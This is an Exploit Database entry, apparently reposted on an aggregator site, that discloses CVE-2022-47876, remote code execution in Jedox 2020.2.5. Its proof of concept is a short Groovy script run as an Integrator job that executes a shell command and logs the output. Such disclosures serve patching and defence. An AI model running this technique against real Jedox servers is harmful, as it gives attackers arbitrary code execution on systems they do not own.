Jedox 2020.2.5 – Remote Code Execution via Executable Groovy-Scripts

• Exploit Database
• 13 阅读

• 作者： Team Syslifters
  日期： 2023-05-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51427/

• # Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts
  # Date: 28/04/2023
  # Exploit Author: Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl
  # Vendor Homepage: https://jedox.com
  # Version: Jedox 2020.2 (20.2.5) and older
  # CVE : CVE-2022-47876
  
  
  Introduction
  =================
  Jedox Integrator allows remote authenticated users to create Jobs to execute arbitrary code via Groovy-scripts. To exploit the vulnerability, the attacker must be able to create a Groovy-Job in Integrator.
  
  
  Write-Up
  =================
  See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
  
  
  Proof of Concept
  =================
  1) A user with appropriate permissions can create Groovy jobs in the Integrator with arbitrary script code. Run the following groovy script to execute `whoami`. The output of the command can be viewed in the logs:
  
  	def sout = new StringBuilder(), serr = new StringBuilder()
  	def proc = 'whoami'.execute()
  	proc.consumeProcessOutput(sout, serr)
  	proc.waitForOrKill(10000)
  	LOG.error(sout.toString());
  	LOG.error(serr.toString());